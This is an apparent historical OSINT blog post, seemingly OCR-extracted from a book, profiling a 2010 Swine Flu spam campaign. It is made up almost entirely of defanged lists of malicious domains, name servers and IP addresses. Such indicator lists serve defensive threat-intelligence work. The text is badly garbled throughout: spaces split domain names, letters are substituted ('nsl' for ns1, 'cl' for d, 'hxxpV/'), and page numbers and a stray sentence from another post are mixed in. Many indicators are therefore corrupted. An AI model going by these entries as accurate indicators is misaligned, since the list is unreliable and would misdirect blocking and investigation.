We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Spamvertized Swine Flu Domains - 
Part Two (2018-10-21 23:50) 

It's 2010 and I've recently came across to a currently active 
diverse portfolio of Swine Flu related domains further 

enticing users into interacting with rogue and malicious 
content. 

In this post I'll profile and expose a currently active 
malicious domains portfolio currently circulating in the 

wild successfully involved in an ongoing variety of Swine Flu 
malicious spam campaigns and will provide actionable 

intelligence on the infrastructure behind it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 
220.248.167.126; 60.191.221.116; 110.52.6.252 

Related name servers known to have participated in 
the campaign: 

hxxp://ns6.plusspice.com - 110.52.6.252 
hxxp://ns2. morewhole.com 
hxxp://ns2.extolshare.com 
hxxp://ns2. pridesure.com 



hxxp://ns2.swell wise.com 
hxxp://ns4. boostwise.com 
hxxp://ns6. maxitrue.com 
hxxp://ns4.sharezeal.com 
hxxp://ns2.extolcalm.com 
hxxp://ns4. humortan.com 
hxxp://ns2 .joysheer.com 
hxxp://ns2.zestleads.com 
hxxp://ns4 .fizzleads.com 
hxxp://ns4. maxigreat.com 
hxxp://ns4.spicy rest.com 
hxxp://ns4. hardyzest.com 
hxxp://ns2.resttrust.com 
hxxp://ns2.alertwow.com 
hxxp://ns2.savetangy.com 
hxxp://ns4. lovetangy.com 
hxxp://ns2.coyrosy.com 

Related malicious domains known to have 
participated in the campaign: 


hxxp://jihpuyab.cn 



hxxp://dabwed ib.cn 

hxxp://jeh rawob.cn 

hxxp://lacgidub.cn 

hxxp://fektiyub.cn 

hxxp://qucmolac.cn 

hxxp://xopfekec.cn 

h XX p://g a mfesec.cn 

hxxp://xokdemic.cn 

hxxp://papxunic.cn 

hxxp://jiqlosic.cn 

hxxp://liynaloc.cn 

hxxp://womrifuc.cn 

hxxp://picduluc.cn 
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hxxp://feqtawuc.cn 
hxxp://becfuzuc.cn 
hxxp://xi mnusad.cn 
hxxp://l imyoxed.cn 
hxxp://cokgozed.cn 
hxxp://qursehod.cn 



h XX p://p imfilod.cn 

hxxp://zofxitod.cn 

hxxp://pehd iwod.cn 

hxxp://ru vvabud.cn 

hxxp://japwolud.cn 

hxxp://qolqaqaf.cn 

hxxp://tacreyaf.cn 

hxxp://raj vufef.cn 

hxxp://hiwjadif.cn 

hxxp://pejjenif.cn 

h XX p://h a kyabof.cn 

hxxp://rijgihag.cn 

hxxp://pipgaqag.cn 

h XX p://j ax kewag.cn 

hxxp://ci kqumog.cn 

hxxp://tircodug.cn 

hxxp://juryaqug.cn 

hxxp://yawfadah.cn 

hxxp://yabtudah.cn 

hxxp://qifhihah.cn 



hxxp://xeyselah.cn 

hxxp://cotmetah.cn 

hxxp://bulmitah.cn 

hxxp://teg bejih.cn 

hxxp://tuymokih.cn 

hxxp://modqopoh.cn 

hxxp://qej pod uh.cn 

hxxp://xajsomuh.cn 

hxxp://wisziruh.cn 

hxxp://maypajej.cn 

hxxp://tivhikej.cn 

hxxp://hol mayej.cn 

hxxp://dabtizej.cn 

hxxp://koyxuwij.cn 

hxxp://romxebuj.cn 

hxxp://hilzuluj.cn 

hxxp://zulfavuj.cn 

h XX p://v ojhowuj.cn 

hxxp://daldukak.cn 

hxxp://ra kvirak.cn 



h XX p ://fi m resa k .c n 
hxxp://zepyosak.cn 
hxxp://tovpi wak.cn 
hxxp://raqhizak.cn 
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hxxp://salhibik.cn 

hxxp://xonzulik.cn 

hxxp://jezwutik.cn 

hxxp://lungodok.cn 

hxxp://qeytakok.cn 

hxxp://weswu kuk.cn 

hxxp://lawmamuk.cn 

hxxp://xomhoruk.cn 

hxxp://zitkowuk.cn 

hxxp://hoyzexuk.cn 

hxxp://cutholal.cn 

hxxp://jidtecel.cn 

hxxp://jovmuhil.cn 

hxxp://guxdipil.cn 

hxxp://kujkuwil.cn 



hxxp://kojvifol.cn 

hxxp://zitgohol.cn 

hxxp://cosxotol.cn 

hxxp://wahwoxol.cn 

hxxp://siqsayol.cn 

hxxp://pipwoqul.cn 

hxxp://zilfumam.cn 

hxxp://fokvidem.cn 

h XX p ://va m h efem. c n 

hxxp://h ipxetem.cn 

hxxp://hasrozem.cn 

hxxp://yovbafim.cn 

hxxp://zutgaq im.cn 

hxxp://kamnorim.cn 

hxxp://nussotim.cn 

hxxp://y iblegom.cn 

hxxp://vorteyom.cn 

hxxp://mokgu pum.cn 

hxxp://xen nesum.cn 

hxxp://fesh ivum.cn 



hxxp://nakcaban.cn 

h XX p://y axxokan.cn 

hxxp://qikciqan.cn 

hxxp://gagsu ran.cn 

hxxp://bopxuran.cn 

hxxp://g iwduvan.cn 

hxxp://gixreqin.cn 

hxxp://leccatin.cn 

hxxp://jollipon.cn 

hxxp://vuzlopon.cn 

hxxp://butkoxon.cn 

hxxp://falyewun.cn 

hxxp://noscajap.cn 

hxxp://xirq ocep.cn 

hxxp://daqdohep.cn 
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hxxp://wokvarep.cn 

hxxp://hoggudip.cn 

hxxp://heqfavip.cn 

hxxp://jowrewip.cn 



hxxp://cimqiqop.cn 

hxxp://cibqobup.cn 

hxxp://zijreyup.cn 

hxxp://tosnabaq.cn 

hxxp://tochekaq.cn 

hxxp://cosmoqaq.cn 

hxxp://zavnusaq.cn 

hxxp://vufsaqeq.cn 

hxxp://dagligiq.cn 

hxxp://wugjaziq.cn 

h XX p://fe psuwoq.cn 

hxxp://pombeyoq.cn 

hxxp://dokcokuq.cn 

hxxp://diwsutuq.cn 

hxxp://sayj umar.cn 

hxxp://jidxurer.cn 

hxxp://qalhiyir.cn 

hxxp://goqtoqor.cn 

h XX p://g axdavor.cn 

hxxp://kazqikas.cn 



hxxp://piskeces.cn 

hxxp://qamhad is.cn 

hxxp://wifdixis.cn 

hxxp://hejhelos.cn 

hxxp://hed wimos.cn 

hxxp://kerrucus.cn 

hxxp://forhalus.cn 

hxxp://fesnupus.cn 

hxxp://lanzuhat.cn 

hxxp://kad mepat.cn 

hxxp://potzoyat.cn 

hxxp://j upkevet.cn 

hxxp://xagmiqit.cn 

hxxp://woxjatit.cn 

hxxp://g ukpuxit.cn 

hxxp://dubpacut.cn 

hxxp://nifbihut.cn 

h XX p://q unkofav.cn 

hxxp://vippogav.cn 

hxxp://rimjulav.cn 



hxxp://kemhenav.cn 

hxxp://gutziqav.cn 

hxxp://gipbilev.cn 

hxxp://kaxcidiv.cn 

hxxp://xaj wawov.cn 

hxxp://rejcoyov.cn 
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hxxp://jogsuduv.cn 
hxxp://lamfog uv.cn 
hxxp://daxtoh uv.cn 
hxxp://mi hwuxuv.cn 
hxxp://h iwjuhaw.cn 
hxxp://gohkijaw.cn 
hxxp://tu wqetaw.cn 
hxxp://lacjebew.cn 
hxxp://vod rubew.cn 
hxxp://peh witew.cn 
hxxp://yezxewew.cn 
hxxp://yuvsobow.cn 
hxxp://yod mapow.cn 



hxxp://qotpobuw.cn 
hxxp://meg rafuw.cn 



hxxp://za mponuw.cn 

hxxp://kotzequw.cn 

hxxp://y udmaruw.cn 

hxxp://hamq iruw.cn 

hxxp://si wwawuw.cn 

hxxp://veq niwuw.cn 

hxxp://bepnudax.cn 

hxxp://jehfefax.cn 

hxxp://boxjokex.cn 

hxxp://yoclerex.cn 

hxxp://guzjacix.cn 

hxxp://mexcekix.cn 

hxxp://kibtixix.cn 

hxxp://conyixix.cn 

hxxp://famlojox.cn 

hxxp://jizwalox.cn 

hxxp://dah howox.cn 

hxxp://zicquvtx.cn 

hxxp://cavxuj ux.cn 



hxxp://voqnolux.cn 

Known to have responded to the same malicious IP 
(60.191.221.123) are also the following malicious do¬ 
mains: 

hxxp://vitsulob.cn 

hxxp://jahnivub.cn 

hxxp://wipviyub.cn 

hxxp://gokbulac.cn 

hxxp://bedqaqac.cn 

hxxp://su vnuqac.cn 

hxxp://wukcilec.cn 

hxxp://lukbolec.cn 

hxxp://juhfaqic.cn 

hxxp://mixwiqic.cn 

hxxp://qikloric.cn 

hxxp://halgiyic.cn 
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hxxp://jocvoloc.cn 

hxxp://gugmikacl.cn 

hxxp://zoqvulacl.cn 



hxxp://zokdoled.cn 

hxxp://daxlated.cn 

hxxp://cahnubid.cn 

hxxp://cufxu hod.cn 

hxxp://libsorod.cn 

hxxp://vopqatod.cn 

hxxp://cebvoyod.cn 

hxxp://lansocud.cn 

hxxp://zohpakud.cn 

hxxp://hekwasud.cn 

hxxp://niknuvud.cn 

hxxp://mey mu haf.cn 

hxxp://nigkojef.cn 

hxxp://bazmoyef.cn 

hxxp://roszadif.cn 

hxxp://sapmofif.cn 

hxxp://kudxodof.cn 

hxxp://pefki pof.cn 

hxxp://xoq resof.cn 

hxxp://fi pxevof.cn 



hxxp://quyzeluf.cn 

hxxp://xujyeruf.cn 

hxxp://xen pi keg.cn 

hxxp://tafwohig.cn 

hxxp://kowtuhig.cn 

hxxp://dinpisig.cn 

hxxp://teryuvig.cn 

hxxp://funcizig.cn 

hxxp://ciytamog.cn 

hxxp://jemsowog.cn 

hxxp://kiqzijug.cn 

hxxp://pulfaxug.cn 

hxxp://wojlabah.cn 

hxxp://belzejah.cn 

hxxp://pefdovah.cn 

hxxp://xijsameh.cn 

hxxp://racridih.cn 

hxxp://rewfahih.cn 

hxxp://vihxujih.cn 

hxxp://qujvosih.cn 



hxxp://figqacuh.cn 
hxxp://xoh mol uh.cn 
hxxp://jicniwuh.cn 
hxxp://ka pxuraj.cn 
hxxp://j ubjavaj.cn 
hxxp://biclkuqej.cn 
hxxp://jarvixej.cn 
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hxxp://qinziclij.cn 

hxxp://zagzafij.cn 

hxxp://merjuwij.cn 

hxxp://weq bujuj.cn 

hxxp://gucclaluj.cn 

hxxp://moclxowuj.cn 

hxxp://tobponak.cn 

hxxp://tacjujek.cn 

hxxp://fumliqek.cn 

hxxp://wavfebik.cn 

hxxp://xizqibik.cn 

hxxp://focnigik.cn 



hxxp://biqmipik.cn 
hxxp://zowcoq ik.cn 
hxxp://fexsitik.cn 
hxxp://qebdevik.cn 
hxxp://xolkisok.cn 
hxxp://kuq wuwok.cn 
hxxp://g unwonuk.cn 
hxxp://hewquvuk.cn 
hxxp://gunbaqal.cn 
hxxp://seysixal.cn 
hxxp://zay mamel.cn 
hxxp://weznohil.cn 
hxxp://keczakil.cn 
hxxp://wawberol.cn 
hxxp://naftemul.cn 
hxxp://secl bonam.cn 
hxxp://vel wapam.cn 
hxxp://zinzutam.cn 
hxxp://nuclg ixam.cn 
hxxp://mi bpabem.cn 



hxxp://yolbaqem.cn 

hxxp://fogduqem.cn 

hxxp://qawtotem.cn 

hxxp://qalfusim.cn 

hxxp://kocg uwim.cn 

hxxp://zishikom.cn 

hxxp://kozpi pom.cn 

hxxp://loblahum.cn 

hxxp://wi nbomum.cn 

hxxp://j akmezum.cn 

hxxp://taglolan.cn 

hxxp://suznu wan.cn 

hxxp://jekwazan.cn 

hxxp://toxmijen.cn 

hxxp://nikguzen.cn 

hxxpV/ded mewin.cn 

hxxp://jebvu wun.cn 

hxxp://tupsikap.cn 
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hxxp://dudsuzap.cn 



hxxp://yessafep.cn 

hxxp://danxenep.cn 

hxxp://leklidip.cn 

hxxp://duklimip.cn 

hxxp://yevnurip.cn 

hxxp://virrotip.cn 

hxxp://lalyezop.cn 

hxxp://jaztecup.cn 

hxxp://gokbehup.cn 

hxxp://cuqyirup.cn 

hxxp://gajvizup.cn 

hxxp://cahwikaq.cn 

hxxp://xeqbelaq.cn 

hxxp://xicbamaq.cn 

hxxp://qofqoneq.cn 

hxxp://g ivxuyeq.cn 

hxxp://gonganiq.cn 

hxxp://vijsoziq.cn 

hxxp://bignijoq.cn 

hxxp://jej roxoq.cn 



hxxp://culfunuq.cn 
hxxp://qevxayuq.cn 
hxxp ://merwosa r.cn 
hxxp://loxvafer.cn 
hxxp ://cawnami r.cn 
hxxp://wocyorir.cn 
hxxp://tokhador.cn 
hxxp://yuznisor.cn 
hxxp://vamtator.cn 
hxxp ://goj I igur.cn 
hxxp ://vu kqejur.cn 
hxxp ://f e wxo pur.cn 
hxxp ://wu kwoxur.cn 
hxxp ://bavyoxu r.cn 
hxxp://jegclufas.cn 
hxxp://rillefes.cn 
hxxp ://n iwwages.cn 
hxxp://comrames.cn 
hxxp://rohfapes.cn 
hxxp://lehreclis.cn 



hxxp://jepniwos.cn 

hxxp://lexxedus.cn 

hxxp://xuljuhus.cn 

hxxp://levgepat.cn 

hxxp://mod hewet.cn 

hxxp://kawlozet.cn 

hxxp://bufsofit.cn 

hxxp://gekloyit.cn 

hxxp://tercifot.cn 
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hxxp://yughaqut.cn 
hxxp://surfabav.cn 
hxxp://y utbevav.cn 
hxxp://mowvahev.cn 
hxxp://tu wcexev.cn 
hxxp://liqfimiv.cn 
hxxp://pefxa muv.cn 
hxxp://goqdexuv.cn 
hxxp://fozlubaw.cn 
hxxp://y uxcizaw.cn 



hxxp://mevvu bew.cn 

hxxp://n uzzuhew.cn 

hxxp://clibkicow.cn 

hxxp://lobrakow.cn 

hxxp://vu ksirow.cn 

hxxp://samnuvow.cn 

hxxp://jizlotuw.cn 

hxxp://buzgikax.cn 

hxxp://j awcesax.cn 

hxxp://qatvegex.cn 

hxxp://gegfejex.cn 

hxxp://cigxekex.cn 

hxxp://kejjobox.cn 

hxxp://yosbucox.cn 

hxxp://kel mogox.cn 

hxxp://jeqyuzox.cn 

hxxp://jocxebux.cn 

hxxp://tawcizux.cn 

hxxp://kittokay.cn 

hxxp://seryusay.cn 



hxxp://nocbusey.cn 
hxxp://semfi hiy.cn 
hxxp://xotgajiy.cn 
hxxp://sarvuj iy.cn 
hxxp://gicmosiy.cn 
hxxp://fulpaziy.cn 
hxxp://cu nzumoy.cn 

Related malicious name servers known to have 
participated in the campaign: 

hxxp://ns2.boostaroma.com - 110.52.6.252 

hxxp://ns2.Oku ltra.com 

hxxp://ns2.swellfab.com 

hxxp://ns2.sheheacl.com 

hxxp://ns2.atbreacl.com 

hxxp://ns2.treatglacl.com 

hxxp://ns2.plumbolcl.com 

hxxp://ns2.callolcl.com 

hxxp://u p2.thicksencl.com 

hxxp://ns6.zestkincl.com 

hxxp://ns2. burn round.com 
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hxxp://ns2. witproud.com 
hxxp://ns2.fizznice.com 
hxxp://ns6.pi usspice.com 
hxxp://u p2.hu maneagree.com 
hxxp://ns2.adorewee.com 
hxxp://ns4. kindable.com 
hxxp://ns2. prideable.com 
hxxp://ns2.cuddly humble.com 
hxxp://ns2.ablewhole.com 
hxxp://ns2.quickwhole.com 
hxxp://ns2. pi umpwhole.com 
hxxp://u p2.begancome.com 
hxxp://u p2.sizeplane.com 
hxxp://u p2.colonytype.com 
hxxp://ns6. prizeaware.com 
hxxp://ns2. pridesure.com 
hxxp://ns2 .toophrase.com 
hxxp://ns2. loyal rise.com 
hxxp://u p2.pathuse.com 



hxxp://ns2.dimplechaste.com 
hxxp://ns2. welltrue.com 
hxxp://ns2.ziptrue.com 
hxxp://ns2.si iverwe.com 
hxxp://ns2.caimprize.com 
hxxp://ns2.firmrich.com 
hxxp://ns2.activeinch.com 
hxxp://ns2.cooi<mu iti.com 
hxxp://ns2. weiimorai.com 
hxxp://ns2.peai<sweii.com 
hxxp://ns2. posewiii.com 
hxxp://ns2.drooicooi.com 
hxxp://u p2.cuddiypoem.com 
hxxp://ns2. ioyaicaim.com 
hxxp://ns2.extoicaim.com 
hxxp://ns2. rad iothan.com 
hxxp://u p2.persontrain.com 
hxxp://ns2.awardfun.com 
hxxp://ns4.zeaireap.com 
hxxp://ns2.piousreap.com 



hxxp://ns2.firstreap.com 
hxxp://ns2.grandzap.com 
hxxp://ns2. royalzap.com 
hxxp://ns6.ablezip.com 
hxxp://ns2.zapeager.com 
hxxp://u p2.blockfather.com 
hxxp://ns2.breezycorner.com 
hxxp://ns2.donewater.com 
hxxp://ns2.1 istenflower.com 
hxxp://ns2.dimplechair.com 
hxxp://u p2.yardcolor.com 
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hxxp://ns4.fizzleads.com 
hxxp://u p2.fi nestgrass.com 
hxxp://ns2. prizebeats.com 
hxxp://ns4. maxigreat.com 
hxxp://ns2 .flairtreat.com 
hxxp://u p2.tingleflat.com 
hxxp://ns6.proudquiet.com 
hxxp://ns2. morequiet.com 



hxxp://ns2.d roolplanet.com 
hxxp://u p2.giftedunit.com 
hxxp://ns2.soiarwit.com 
hxxp://ns2. ropemeant.com 
hxxp://ns2. pa rad iseobedient.com 
hxxp://ns4. pa rad iseobedient.com 
hxxp://u p2.mineaiert.com 
hxxp://ns4.spicy rest.com 
hxxp://ns4.aiertjust.com 
hxxp://ns2. resttrust.com 
hxxp://ns2.pagefew.com 
hxxp://ns2. mu itiagiow.com 
hxxp://ns2.objectaiiow.com 
hxxp://ns2.aiertwow.com 
hxxp://ns2.ai ivejuicy.com 
hxxp://ns2. restjuicy.com 
hxxp://ns2 .funcomfy.com 
hxxp://ns2.soiarcomfy.com 
hxxp://ns2. prizetangy.com 
hxxp://ns2. whoiehappy.com 



hxxp://ns2.prideeasy.com 

hxxp://ns2.suddeneasy.com 

hxxp://ns2 .treatrosy.com 

hxxp://ns2.earlytwenty.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://xiskizop.cn 

58.17.3.44; 

60.191.239.189; 

203.93.208.86 


hxxp://ns5. prizeaware.com; 

hxxp://nsl.grandzap.com; hxxp://ns3.alertjust.com 

Related malicious domains known to have 
participated in the campaigns: 

hxxp://xancefab.cn 

hxxp://busgihab.cn 

hxxp://putcojab.cn 

hxxp://nizvonab.cn 

hxxp://bulpapab.cn 



hxxp://laztoqab.cn 

hxxp://varsesab.cn 

hxxp://pahdeheb.cn 

hxxp://wiqponeb.cn 

hxxp://rutfuseb.cn 

hxxp://zacniyeb.cn 

hxxp://beblelib.cn 
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hxxp://gahvosib.cn 

hxxp://rigzowib.cn 

hxxp://bacnaxib.cn 

hxxp://pexyufob.cn 

hxxp://sowgugob.cn 

hxxp://buhbulob.cn 

hxxp://ciybufub.cn 

hxxp://xodd imub.cn 

hxxp://nugtaqub.cn 

hxxp://buvkuzub.cn 

hxxp://fi kqebac.cn 

hxxp://pevremac.cn 



hxxp://qokbasac.cn 

hxxp://patmebec.cn 

hxxp://kuntigec.cn 

hxxp://jolcekec.cn 

hxxp://wihjorec.cn 

hxxp://fixruyec.cn 

hxxp://gospozec.cn 

hxxp://batrijic.cn 

hxxp://rebzomic.cn 

hxxp://loq rupic.cn 

hxxp://cliqhaqic.cn 

hxxp://bohkoqic.cn 

hxxp://beszesic.cn 

hxxp://tuzhovic.cn 

hxxp://hesyuvic.cn 

hxxp://kovhewic.cn 

hxxp://lufreyic.cn 

hxxp://noxrazic.cn 

hxxp://lefviboc.cn 

hxxp://foclcuboc.cn 



hxxp://pevhihoc.cn 

hxxp://widlajoc.cn 

hxxp://zocwoloc.cn 

hxxp://janpupoc.cn 

hxxp://mefbuqoc.cn 

hxxp://hujqezoc.cn 

hxxp://capjebuc.cn 

hxxp://befqacuc.cn 

hxxp://socjujuc.cn 

hxxp://qivbiruc.cn 

hxxp://tuxbaxuc.cn 

hxxp://tidsuyuc.cn 

hxxp://kapdacad.cn 

hxxp://lagfagad.cn 

hxxp://japtugad.cn 

hxxp://bechu mad.cn 

hxxp://holceqad.cn 

hxxp://bectusad.cn 
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hxxp://tabzu wad.cn 



hxxp://red nezad.cn 

hxxp://megzizad.cn 

hxxp://forvafed.cn 

hxxp://hojliged.cn 

hxxp://fuxcexed.cn 

hxxp://baxpuxed.cn 

hxxp://lugjized.cn 

hxxp://lewdozed.cn 

hxxp://hiszedid.cn 

hxxp://buyquhid.cn 

hxxp://wovyokid.cn 

hxxp://yojvimid.cn 

hxxp://widxixid.cn 

hxxp://yovxoxid.cn 

hxxp://rey wufod.cn 

hxxp://h ubzahod.cn 

hxxp://qapzekod.cn 

hxxp://falxalod.cn 

hxxp://yiznunod.cn 

hxxp://towqotod.cn 



hxxp://loxlayod.cn 

hxxp://rockozod.cn 

hxxp://joh mabud.cn 

hxxp://muvy ucud.cn 

hxxp://vattehud.cn 

hxxp://fuytej ud.cn 

hxxp://kenyilud.cn 

hxxp://cibsarud.cn 

hxxp://najsatud.cn 

hxxp://xi bwazud.cn 

hxxp://l aztafaf.cn 

hxxp://piynosaf.cn 

hxxp://yelpidef.cn 

hxxp://yagtudef.cn 

hxxp://levxifef.cn 

hxxp://povxajef.cn 

hxxp://hetbetef.cn 

hxxp://h udvotef.cn 

hxxp://hemfowef.cn 

hxxp://coqvazef.cn 



hxxp://yawhoj if.cn 

hxxp://muvcewif.cn 

hxxp://xadgobof.cn 

hxxp://baxwu hof.cn 

hxxp://wijtekof.cn 

hxxp://sknq ikof.cn 

hxxp://mussiqof.cn 

h XX p: //g eg wa sof. c n 

hxxp://xangesof.cn 

146 

hxxp://wumciewof.cn 

hxxp://hoqtayof.cn 

hxxp://kiyvayof.cn 

hxxp://cufciicuf.cn 

hxxp://gotbucuf.cn 

hxxp://gexzehuf.cn 

hxxp://cepceiuf.cn 

hxxp://gepieiuf.cn 

hxxp://tefhosuf.cn 

hxxp://xaqqivuf.cn 



hxxp://wu bfezuf.cn 

hxxp://panrozuf.cn 

hxxp://nadvofag.cn 

hxxp://yawjehag.cn 

hxxp://zeltimag.cn 

hxxp://misgaqag.cn 

hxxp://noxyaxag.cn 

hxxp://sunluxag.cn 

hxxp://bozhoceg.cn 

hxxp://dawqefeg.cn 

hxxp://locfemeg.cn 

hxxp://mivlaneg.cn 

hxxp://vaqxiseg.cn 

hxxp://gesyateg.cn 

hxxp ://ku mweteg.cn 

hxxp://jefpaveg.cn 

hxxp://lilyegig.cn 

hxxp://janweqig.cn 

hxxp://diwjusig.cn 

hxxp://sohmiwig.cn 



hxxp://rimmazig.cn 

hxxp://tirpedog.cn 

hxxp://j amguhog.cn 

hxxp://bejfakog.cn 

hxxp://bebyolog.cn 

hxxp://kixmamog.cn 

hxxp://tofyeqog.cn 

hxxp://kojxuqog.cn 

hxxp://puqtabug.cn 

hxxp://suszibug.cn 

hxxp://ciwracug.cn 

hxxp://nah bugug.cn 

hxxp://gaygokug.cn 

hxxp://seygoqug.cn 

hxxp://helqasug.cn 

hxxp://tockesug.cn 

hxxp://jipqevug.cn 

hxxp://rewnowug.cn 

hxxp://nazxefah.cn 

hxxp://hofkagah.cn 
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hxxp://coszegah.cn 

hxxp://vojyojah.cn 

hxxp://nihwalah.cn 

hxxp://yojzatah.cn 

hxxp://buvsutah.cn 

hxxp://hulgadeh.cn 

hxxp://nibzofeh.cn 

hxxp://xickeqeh.cn 

hxxp://ka pmereh.cn 

hxxp://regyaveh.cn 

hxxp://lizpazeh.cn 

hxxp://lujpobih.cn 

hxxp://xozyecih.cn 

hxxp://telhetih.cn 

hxxp://dussadoh.cn 

hxxp://lerbenoh.cn 

hxxp://yokveqoh.cn 

hxxp://hafgoqoh.cn 

hxxp://gagkiroh.cn 



hxxp://teftebuh.cn 

hxxp://fi tsofuh.cn 

hxxp://zi wvomuh.cn 

hxxp://fazlenuh.cn 

hxxp://gazkinuh.cn 

hxxp://cl utmivuh.cn 

hxxp://zukclayuh.cn 

hxxp://busgayuh.cn 

hxxp://nohpobaj.cn 

hxxp://qusclumaj.cn 

hxxp://wizclaqaj.cn 

hxxp://wu wbeqaj.cn 

hxxpV/girzidej.cn 

hxxp://vespifej.cn 

hxxp://ceszegej.cn 

hxxp://juqbumej.cn 

hxxp://xuxmanej.cn 

Related malicious name servers known to have 
participated in the campaign: 

hxxp://nsl.quvzipcla.com - 193.165.209.3 



hxxp://nsl.syquskezaja.com 
hxxp://nsl. mnysiwugpa.com 
hxxp://nsl.uzfayxlob.com 
hxxp://nsl.umkeihfub.com 
hxxp://nsl.ciietheaithworici.com 
hxxp://ns2.ciietheaithworici.com 
hxxp://nsl. pi iishopstore.com 
hxxp://ns2. pi iishopstore.com 
hxxp://nsl.ixcopvucieg.com 
hxxp://nsl.cuzatpih.com 
hxxp://nsl.fonciu koiwi.com 
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hxxp://nsl.zevmyxhyhi.com 
hxxp://nsl. pecsietoii.com 
hxxp://nsl. havputviwi.com 
hxxp://nsl. icuhzapyi.com 
hxxp://nsl.oiiectimon.com 
hxxp://nsl.caipuwhup.com 
hxxp://nsl.miacohcier.com 
hxxp://nsl. rjycbaswes.com 



hxxp://nsl.tlyldihkis.com 
hxxp://ns2. bestfreepills.com 
hxxp://ns2.storeheaithpiiis.com 
hxxp://nsl. medspiiisdiscounts.com 
hxxp://nsl. ribormoiu.com 
hxxp://nsl.si uxjagvyw.com 
hxxp://nsl. marttabietsrx.com 
hxxp://nsl.zirremeaby.com 
hxxp://nsl.xioduvvejy.com 
hxxp://nsl.tmypheatvy.com 
hxxp://nsl.zurmeigguz.com 
hxxp://nsl. pendyxconvam.net 
hxxp://nsl. mevkybmomu.net 
hxxp://nsl. wutvymnu.net 
hxxp://nsl.atquackephix.net 
hxxp://nsl.gneqwyapuz.net 
hxxp://nsl.az6.ru 
hxxp://nsl.compmegastore.ru 
hxxp://nsl. wearcompstore.ru 
hxxp://nsl.compnetstore.ru 



hxxp://nsl.seaportative.ru 

hxxp://nsl. webshopmag.ru 

hxxp://ns2. webshopmag.ru 

hxxp://nsl. markettradersmag.ru 

hxxp://nsl.storeonlinecomp.ru 

hxxp://nsl.i ivingmagcomp.ru 

hxxp://nsl. magcompdirect.ru 

hxxp://nsl.storemycompdirect.ru 

Related malicious domains known to have 
participated in the campaigns: 

hxxp://hyuijavmyca.com - 212.174.200.111 

hxxp://rj iofnida.com 

hxxp://i ubetokbufa.com 

hxxp://homhyi vega.com 

hxxp://syquskezaja.com 

hxxp://kri wmikib.com 

hxxp://rhuwcug niob.com 

hxxp://fon rasetiid.com 

hxxp://rycny rfikre.com 

hxxp://ton iijwe.com 



hxxp://mefcyq wef.com 
hxxp://lorcowu rayf.com 
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hxxp://u beuhroqug.com 
hxxp://facljy bzih.com 
hxxp://g haknikfehi.com 
hxxp://ksoknaclsi.com 
hxxp://foncl ukoiwi.com 
hxxp://reixvy klick.com 
hxxp://q worjulnenk.com 
hxxp://svozquzrel.com 
hxxp://pecsletoil.com 
hxxp://havputvi wl.com 
hxxp://penclyxconvam.com 
hxxp://whapzi ntaon.com 
hxxp://ol lectimon.com 
hxxp://japyebawn.com 
hxxp://xovtemfajo.com 
hxxp://shy mu moufjo.com 
hxxp://cal puwhup.com 



hxxp://iescehqucr.com 

hxxp://thepi I lcorner.com 

hxxp ://kvi ri ncyofr.com 

hxxp://iecoqwecs.com 

hxxp://syquskezaja.com - 200.204.57.187 

hxxp ://cuzatpih.com 

hxxp ://ol lectimon.com 

hxxp ://sl uxjagvyw.com 

hxxp ://xioclu vvejy.com 

hxxp://nravsaelvi.net 

hxxp ://penclyxconvam. net 

hxxp ://mevky bmomu.net 

hxxp://atquackephix.net 

hxxp ://g neqwyapuz.net 

Related malicious domains known to have 
participated in the campaign: 

hxxp://tovpuveb.cn 

hxxp://risregib.cn 

hxxp://sapwopub.cn 

hxxp://kutwuzub.cn 



hxxp://dijmigac.cn 

hxxp://davzunic.cn 

hxxp://cuwlicoc.cn 

hxxp://hinkizad.cn 

hxxp://tiwkicid.cn 

hxxp://giddehid.cn 

hxxp://qehmujid.cn 

hxxp://jadyoxid.cn 

hxxp://yipxakud.cn 

hxxp://qophepud.cn 

hxxp://nawfusud.cn 

hxxp://xohpebaf.cn 

150 

hxxp://yilqobaf.cn 

hxxp://gelkinef.cn 

hxxp://zigconef.cn 

h XX p: //v a sg otef. c n 

hxxp://gitmufif.cn 

hxxp://pujxatof.cn 

hxxp://tagcafuf.cn 



hxxp://joywehuf.cn 

hxxp://xoggu nuf.cn 

hxxp://pezpipuf.cn 

hxxp://gugfequf.cn 

hxxp://kattowuf.cn 

hxxp://rosmicag.cn 

hxxp://nag nuteg.cn 

hxxp://fohjeclig.cn 

hxxpV/hijderig.cn 

hxxp://cl ittomog.cn 

hxxp://zu bwefah.cn 

hxxp://foclpohah.cn 

hxxp://seh viwah.cn 

hxxpV/hifkuneh.cn 

hxxp://bicifecih.cn 

hxxp://wuxmu iih.cn 

hxxp://beqwacoh.cn 

hxxp://q ukvimoh.cn 

hxxp://vasxavoh.cn 

hxxp://saixaxoh.cn 



hxxp://labyocaj.cn 

hxxp://zigxadij.cn 

hxxp://hixkanij.cn 

hxxp://zixkitoj.cn 

hxxp://zijzoguj.cn 

hxxp://yiwzuluj.cn 

hxxp://su rvuruj.cn 

hxxp://feftuqak.cn 

hxxp://ziscawak.cn 

hxxp://wacpowek.cn 

hxxp://segjinuk.cn 

hxxp://viqfizuk.cn 

hxxp://qawgegal.cn 

hxxp://loqfogal.cn 

hxxp://sihwohal.cn 

hxxp://babtakal.cn 

hxxp://nag nemel.cn 

hxxp://ribwegil.cn 

hxxp://watpiyil.cn 

hxxp://goxmabul.cn 



hxxp://siwkecul.cn 

hxxp://selzimul.cn 

hxxp://qakwivul.cn 
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hxxp://bedvuyul.cn 

hxxp://fiddozul.cn 

hxxp://joldokim.cn 

hxxp://foztokim.cn 

hxxp://wokl ahum.cn 

hxxp://gavsanum.cn 

hxxp://kej rupum.cn 

hxxp://hagjatum.cn 

hxxp://xu mfuzum.cn 

hxxp://mafcocan.cn 

hxxp://geqkedan.cn 

hxxp://fu mhasan.cn 

hxxp://zosqinen.cn 

hxxp://nonzinen.cn 

hxxp://tahyedin.cn 

hxxp://niyyurin.cn 



hxxp://wokmison.cn 

hxxp://nekmerun.cn 

hxxp://gebzevun.cn 

hxxp://dizxohap.cn 

hxxp://wi rzovap.cn 

hxxp://cobyizip.cn 

hxxp://sokwi mop.cn 

hxxp://cligjipop.cn 

hxxp://qagtohup.cn 

hxxp://wocl kepaq.cn 

hxxp://kuqqavaq.cn 

hxxp://vogyafeq.cn 

hxxp://qokyaziq.cn 

hxxp://gelmaloq.cn 
